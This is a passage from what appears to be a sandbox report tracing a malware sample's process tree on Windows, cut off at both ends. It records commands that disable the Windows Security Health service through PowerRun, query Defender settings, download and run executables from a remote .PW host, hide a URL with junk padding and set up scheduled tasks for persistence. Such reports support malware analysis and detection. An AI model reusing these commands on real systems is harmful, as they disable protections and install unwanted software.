      - C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun64.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t reg_DWORD /d "4" /f
        6⤵
        
        PID:4408
        
        C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun64.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t reg_DWORD /d "4" /f
        7⤵
        
        PID:4328
        
        C:\Windows\System32\reg.exe
        
        "C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t reg_DWORD /d "4" /f
        8⤵
        
        PID:2500
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        Powershell -Command "Get-MpPreference"
        5⤵
        
        PID:2736
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        Powershell -Command "$wshell=New-Object -ComObject wscript.shell; $wshell.SendKeys('^a')
        5⤵
        
        PID:5100
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        Powershell -Command "$wshell=New-Object -ComObject wscript.shell; $wshell.SendKeys('^c')
        5⤵
        
        PID:3456
  - - C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\xosefpx.exe
      "C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\xosefpx.exe" "http://www.winfreycmh.PW/ee/12337506?4192289f4192289=1689838620009923700=0- 905"
      4⤵
      PID:1168
    - - C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe
        
        dw20.exe -x -s 792
        5⤵
        
        PID:1108
  - - C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\uilwehjwbwb.exe
      "C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\uilwehjwbwb.exe" "http://www.winfreycmh.PW/ee/12337506?4192289g4192289==991878=991878;1" "991878;7qyfd;991878;1689838620009923700;1689838620009923700" "C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\4192289"
      4⤵
      PID:3504
  - - C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\uilwehjwbwb.exe
      "C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\uilwehjwbwb.exe" "http://www.winfreycmh.PW/Nbrpgmmr.exe" "991878;z7rs3;1689838620009923700" "C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\Nbrpgmmr.exe"
      4⤵
      PID:2736
  - - C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\xosefpx.exe
      "C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\xosefpx.exe" "http://www.winfreycmh.PW/ee/12337506?4192289f4192289=1689838620009923700=-exe-0" "C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\905"
      4⤵
      Modifies security service
      PID:1524
  - - C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\xosefpx.exe
      "C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\xosefpx.exe" "http://www.winfreycmh.PW/ee/12337506?4192289f4192289=1689838620009923700=ajmhcxtfajmhcxtf" "C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\905"
      4⤵
      PID:1620
  - - C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\Nbrpgmmr.exe
      "C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\Nbrpgmmr.exe" "xosefpx.exe" "http://www.winfreycmh.PW"
      4⤵
      PID:3420
    - - C:\Users\Admin\AppData\Local\Temp\nsd9306.tmp\MicrosoftEdgeWebview2Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsd9306.tmp\MicrosoftEdgeWebview2Setup.exe" /silent /install
        5⤵
        
        PID:3504
      - C:\Program Files (x86)\Microsoft\Temp\EU9353.tmp\MicrosoftEdgeUpdate.exe
        
        "C:\Program Files (x86)\Microsoft\Temp\EU9353.tmp\MicrosoftEdgeUpdate.exe" /silent /install "appguid={F3017226-FE2A-4295-8BDF-00C3A9A7E4C5}&appname=Microsoft%20Edge%20Webview2%20Runtime&needsadmin=prefers"
        6⤵
        
        PID:4328
        
        C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
        
        "C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /regsvc
        7⤵
        
        PID:2092
        
        C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
        
        "C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /regserver
        7⤵
        
        PID:4360
        
        C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.175.27\MicrosoftEdgeUpdateComRegisterShell64.exe
        
        "C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.175.27\MicrosoftEdgeUpdateComRegisterShell64.exe"
        8⤵
        
        PID:4832
        
        C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.175.27\MicrosoftEdgeUpdateComRegisterShell64.exe
        
        "C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.175.27\MicrosoftEdgeUpdateComRegisterShell64.exe"
        8⤵
        
        PID:4172
        
        C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.175.27\MicrosoftEdgeUpdateComRegisterShell64.exe
        
        "C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.175.27\MicrosoftEdgeUpdateComRegisterShell64.exe"
        8⤵
        
        PID:4784
        
        C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
        
        "C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJPbWFoYSIgdXBkYXRlcnZlcnNpb249IjEuMy4xNzUuMjciIHNoZWxsX3ZlcnNpb249IjEuMy4xNzUuMjciIGlzbWFjaGluZT0iMSIgc2Vzc2lvbmlkPSJ7MjNEODNDNkQtQTI1RC00MjI1LUJCM0QtMDY1MkJFQjU4RkQ1fSIgdXNlcmlkPSJ7NzhDN0Q1NTMtNEI2Ni00RTEzLUI0QTctNDNGOUM2Mzc1RkQyfSIgaW5zdGFsbHNvdXJjZT0ib3RoZXJpbnN0YWxsY21kIiByZXF1ZXN0aWQ9IntGRUNBRTJCMS02MzA5LTQyMTktOEY5Mi01QUY3Q0M3RjNBRkJ9IiBkZWR1cD0iY3IiIGRvbWFpbmpvaW5lZD0iMCI-PGh3IGxvZ2ljYWxfY3B1cz0iOCIgcGh5c21lbW9yeT0iOCIgZGlza190eXBlPSIyIiBzc2U9IjEiIHNzZTI9IjEiIHNzZTM9IjEiIHNzc2UzPSIxIiBzc2U0MT0iMSIgc3NlNDI9IjEiIGF2eD0iMSIvPjxvcyBwbGF0Zm9ybT0id2luIiB2ZXJzaW9uPSIxMC4wLjE5MDQxLjEyODgiIHNwPSIiIGFyY2g9Ing2NCIgcHJvZHVjdF90eXBlPSI0OCIgaXNfd2lwPSIwIiBpc19pbl9sb2NrZG93bl9tb2RlPSIwIi8-PG9lbSBwcm9kdWN0X21hbnVmYWN0dXJlcj0iREFEWSIgcHJvZHVjdF9uYW1lPSJTdGFuZGFyZCBQQyAoUTM1ICsgSUNIOSwgMjAwOSkiLz48ZXhwIGV0YWc9IiZxdW90O3FXSlN6V3dQZmRjTFIrWEdJdjZ4clpmaVlPeGhQVTJzMU5XbWpXY2FGUGc9JnF1b3Q7Ii8-PGFwcCBhcHBpZD0ie0YzQzRGRTAwLUVGRDUtNDAzQi05NTY5LTM5OEEyMEYxQkE0QX0iIHZlcnNpb249IjEuMy4xNzUuMjkiIG5leHR2ZXJzaW9uPSIxLjMuMTc1LjI3IiBsYW5nPSIiIGJyYW5kPSIiIGNsaWVudD0iIj48ZXZlbnQgZXZlbnR0eXBlPSIyIiBldmVudHJlc3VsdD0iMSIgZXJyb3Jjb2RlPSIwIiBleHRyYWNvZGUxPSIwIiBzeXN0ZW1fdXB0aW1lX3RpY2tzPSI3NDE4MTkzNzg4IiBpbnN0YWxsX3RpbWVfbXM9IjE1NjMiLz48L2FwcD48L3JlcXVlc3Q-
        7⤵
        
        PID:4236
        
        C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
        
        "C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /handoff "appguid={F3017226-FE2A-4295-8BDF-00C3A9A7E4C5}&appname=Microsoft%20Edge%20Webview2%20Runtime&needsadmin=prefers" /installsource otherinstallcmd /sessionid "{23D83C6D-A25D-4225-BB3D-0652BEB58FD5}" /silent
        7⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Checks whether UAC is enabled
        Suspicious use of NtSetInformationThreadHideFromDebugger
        
        PID:3688
    - - C:\Users\Admin\AppData\Local\Temp\nsd9306.tmp\40170.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsd9306.tmp\40170.exe"
        5⤵
        
        PID:2092
    - - C:\Users\Admin\AppData\Local\Temp\nsd9306.tmp\moakley.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsd9306.tmp\moakley.exe"
        5⤵
        
        PID:2288
    - - C:\Users\Admin\AppData\Local\Temp\nsd9306.tmp\imax.exe
        
        C:\Users\Admin\AppData\Local\Temp\nsd9306.tmp\imax.exe "C:\Users\Admin\AppData\Local\Temp\nsd9306.tmp\theocracy"
        5⤵
        
        PID:5376
      - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /xml ""C:\Users\Admin\AppData\Local\Temp\nsd9306.tmp\theocracy".xml" /tn "" /f
        6⤵
        Creates scheduled task(s)
        
        PID:3312
    - - C:\Users\Admin\AppData\Local\Temp\nsd9306.tmp\imax.exe
        
        C:\Users\Admin\AppData\Local\Temp\nsd9306.tmp\imax.exe "C:\Users\Admin\AppData\Local\Temp\nsd9306.tmp\gridding"
        5⤵
        
        PID:552
      - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /xml ""C:\Users\Admin\AppData\Local\Temp\nsd9306.tmp\gridding".xml" /tn "" /f
        6⤵
        Creates scheduled task(s)
        
        PID:5740
    - - C:\Users\Admin\AppData\Local\Temp\nsd9306.tmp\imax.exe
        
        C:\Users\Admin\AppData\Local\Temp\nsd9306.tmp\imax.exe "C:\Users\Admin\AppData\Local\Temp\nsd9306.tmp\Ceaseless"
        5⤵
        
        PID:5612
      - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /xml ""C:\Users\Admin\AppData\Local\Temp\nsd9306.tmp\Ceaseless".xml" /tn "" /f
        6⤵
        Creates scheduled task(s)
        
        PID:5712
    - - C:\Users\Admin\AppData\Local\Temp\nsd9306.tmp\imax.exe
        
        C:\Users\Admin\AppData\Local\Temp\nsd9306.tmp\imax.exe "C:\Users\Admin\AppData\Local\Temp\nsd9306.tmp\Lashing"
        5⤵
        
        PID:5928
      - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /xml ""C:\Users\Admin\AppData\Local\Temp\nsd9306.tmp\Lashing".xml" /tn "" /f
        6⤵
        Creates scheduled task(s)
        
        PID:4828
    - - C:\Users\Admin\AppData\Local\Temp\nsd9306.tmp\imax.exe
        
        C:\Users\Admin\AppData\Local\Temp\nsd9306.tmp\imax.exe "C:\Users\Admin\AppData\Local\Temp\nsd9306.tmp\hcf"
        5⤵
        
        PID:4608
      - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /xml ""C:\Users\Admin\AppData\Local\Temp\nsd9306.tmp\hcf".xml" /tn "" /f
        6⤵
        Creates scheduled task(s)
        
        PID:5220
    - - C:\Users\Admin\AppData\Local\Temp\nsd9306.tmp\imax.exe
        
        C:\Users\Admin\AppData\Local\Temp\nsd9306.tmp\imax.exe "C:\Users\Admin\AppData\Local\Temp\nsd9306.tmp\unproductive"
        5⤵
        
        PID:5472
      - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /xml ""C:\Users\Admin\AppData\Local\Temp\nsd9306.tmp\unproductive".xml" /tn "" /f
        6⤵
        Creates scheduled task(s)
        
        PID:5936
    - - C:\Users\Admin\AppData\Local\Temp\nsd9306.tmp\imax.exe
        
        C:\Users\Admin\AppData\Local\Temp\nsd9306.tmp\imax.exe "C:\Users\Admin\AppData\Local\Temp\nsd9306.tmp\CeaselessL"
        5⤵
        
        PID:5368
      - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /xml ""C:\Users\Admin\AppData\Local\Temp\nsd9306.tmp\CeaselessL".xml" /tn "" /f
        6⤵
        Creates scheduled task(s)
        
        PID:996
    - - C:\Users\Admin\AppData\Local\Temp\nsd9306.tmp\imax.exe
        
        C:\Users\Admin\AppData\Local\Temp\nsd9306.tmp\imax.exe "C:\Users\Admin\AppData\Local\Temp\nsd9306.tmp\LashingL"
        5⤵
        
        PID:6120
      - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /xml ""C:\Users\Admin\AppData\Local\Temp\nsd9306.tmp\LashingL".xml" /tn "" /f
        6⤵
        Creates scheduled task(s)
        
        PID:5220
    - - C:\Program Files (x86)\Neurobiological\Ceaseless.exe
        
        "C:\Program Files (x86)\Neurobiological\Ceaseless.exe" "tgbnhyhtgbnhyttgbnhyttgbnhyptgbnhy:tgbnhy/tgbnhy/tgbnhywtgbnhywtgbnhywtgbnhy.tgbnhyftgbnhyotgbnhyntgbnhyttgbnhyetgbnhyntgbnhyotgbnhyttgbnhystgbnhyutgbnhy.tgbnhyctgbnhyotgbnhymtgbnhy/tgbnhyzr2i0i2i3itgbnhy0v7v2zr0zrtgbnhyihtml93J9HtgbnhyQtZordWTPRtgbnhyngLnB"
        5⤵
        
        PID:5940
      - C:\Program Files (x86)\Microsoft\EdgeWebView\Application\114.0.1823.86\msedgewebview2.exe
        
        "C:\Program Files (x86)\Microsoft\EdgeWebView\Application\114.0.1823.86\msedgewebview2.exe" --embedded-browser-webview=1 --webview-exe-name=Ceaseless.exe --webview-exe-version=1.0.0.0 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\tim94\EBWebView" --noerrdialogs --embedded-browser-webview-dpi-awareness=0 --disable-features=MojoIpcz --mojo-named-platform-channel-pipe=5940.3192.2677801317173368072
        6⤵
        
        PID:5588
        
        C:\Program Files (x86)\Microsoft\EdgeWebView\Application\114.0.1823.86\msedgewebview2.exe
        
        "C:\Program Files (x86)\Microsoft\EdgeWebView\Application\114.0.1823.86\msedgewebview2.exe" --type=gpu-process --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Temp\tim94\EBWebView" --webview-exe-name=Ceaseless.exe --webview-exe-version=1.0.0.0 --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=0 --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --mojo-platform-channel-handle=1876 --field-trial-handle=1880,i,360145277865315206,14202277490085474760,262144 --disable-features=MojoIpcz /prefetch:2
        7⤵
        
        PID:5736
        
        C:\Program Files (x86)\Microsoft\EdgeWebView\Application\114.0.1823.86\msedgewebview2.exe
        
        "C:\Program Files (x86)\Microsoft\EdgeWebView\Application\114.0.1823.86\msedgewebview2.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Temp\tim94\EBWebView" --webview-exe-name=Ceaseless.exe --webview-exe-version=1.0.0.0 --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=0 --mojo-platform-channel-handle=3140 --field-trial-handle=1880,i,360145277865315206,14202277490085474760,262144 --disable-features=MojoIpcz /prefetch:8
        7⤵
        
        PID:2788
        
        C:\Program Files (x86)\Microsoft\EdgeWebView\Application\114.0.1823.86\msedgewebview2.exe
        
        "C:\Program Files (x86)\Microsoft\EdgeWebView\Application\114.0.1823.86\msedgewebview2.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Temp\tim94\EBWebView" --webview-exe-name=Ceaseless.exe --webview-exe-version=1.0.0.0 --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=0 --mojo-platform-channel-handle=3104 --field-trial-handle=1880,i,360145277865315206,14202277490085474760,262144 --disable-features=MojoIpcz /prefetch:3
        7⤵
        
        PID:5708
        
        C:\Program Files (x86)\Microsoft\EdgeWebView\Application\114.0.1823.86\msedgewebview2.exe
        
        "C:\Program Files (x86)\Microsoft\EdgeWebView\Application\114.0.1823.86\msedgewebview2.exe" --type=renderer --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Temp\tim94\EBWebView" --webview-exe-name=Ceaseless.exe --webview-exe-version=1.0.0.0 --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=0 --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --js-flags="--harmony-weak-refs-with-cleanup-some --expose-gc --ms-user-locale=" --mojo-platform-channel-handle=3160 --field-trial-handle=1880,i,360145277865315206,14202277490085474760,262144 --disable-features=MojoIpcz /prefetch:1
        7⤵
        
        PID:6240
        
        C:\Program Files (x86)\Microsoft\EdgeWebView\Application\114.0.1823.86\msedgewebview2.exe
        
        "C:\Program Files (x86)\Microsoft\EdgeWebView\Application\114.0.1823.86\msedgewebview2.exe" --type=renderer --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Temp\tim94\EBWebView" --webview-exe-name=Ceaseless.exe --webview-exe-version=1.0.0.0 --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=0 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --js-flags="--harmony-weak-refs-with-cleanup-some --expose-gc --ms-user-locale=" --mojo-platform-channel-handle=4184 --field-trial-handle=1880,i,360145277865315206,14202277490085474760,262144 --disable-features=MojoIpcz /prefetch:1
        7⤵
        
        PID:6712
        
        C:\Program Files (x86)\Microsoft\EdgeWebView\Application\114.0.1823.86\msedgewebview2.exe
        
        "C:\Program Files (x86)\Microsoft\EdgeWebView\Application\114.0.1823.86\msedgewebview2.exe" --type=renderer --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Temp\tim94\EBWebView" --webview-exe-name=Ceaseless.exe --webview-exe-version=1.0.0.0 --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=0 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --js-flags="--harmony-weak-refs-with-cleanup-some --expose-gc --ms-user-locale=" --mojo-platform-channel-handle=4140 --field-trial-handle=1880,i,360145277865315206,14202277490085474760,262144 --disable-features=MojoIpcz /prefetch:1
        7⤵
        
        PID:1564
        
        C:\Program Files (x86)\Microsoft\EdgeWebView\Application\114.0.1823.86\msedgewebview2.exe
        
        "C:\Program Files (x86)\Microsoft\EdgeWebView\Application\114.0.1823.86\msedgewebview2.exe" --type=renderer --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Temp\tim94\EBWebView" --webview-exe-name=Ceaseless.exe --webview-exe-version=1.0.0.0 --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=0 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --js-flags="--harmony-weak-refs-with-cleanup-some --expose-gc --ms-user-locale=" --mojo-platform-channel-handle=4628 --field-trial-handle=1880,i,360145277865315206,14202277490085474760,262144 --disable-features=MojoIpcz /prefetch:1
        7⤵
        
        PID:6204
    - - C:\Users\Admin\AppData\Local\Temp\nsd9306.tmp\imax.exe
        
        C:\Users\Admin\AppData\Local\Temp\nsd9306.tmp\imax.exe "C:\Users\Admin\AppData\Local\Temp\nsd9306.tmp\conveyances"
        5⤵
        
        PID:6036
      - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /xml ""C:\Users\Admin\AppData\Local\Temp\nsd9306.tmp\conveyances".xml" /tn "" /f
        6⤵
        Creates scheduled task(s)
        
        PID:492
    - - C:\Program Files (x86)\Neurobiological\conveyances.exe
        
        "C:\Program Files (x86)\Neurobiological\conveyances.exe"
        5⤵
        
        PID:5392
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:5648
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:6976
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:3076
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:5892
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:1808
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:6504
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:7156
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:5984
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:3076
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:6384
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:2176
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:6084
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:3408
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:2088
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:5488
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:6880
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:6380
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:3648
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:6860
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:404
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:6460
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:6348
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:5436
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:2956
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:2576
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:4340
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:6044
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:2524
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:6232
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:6804
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:6576
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:6596
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:6232
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:1200
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:5652
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:6976
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:6980
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
        
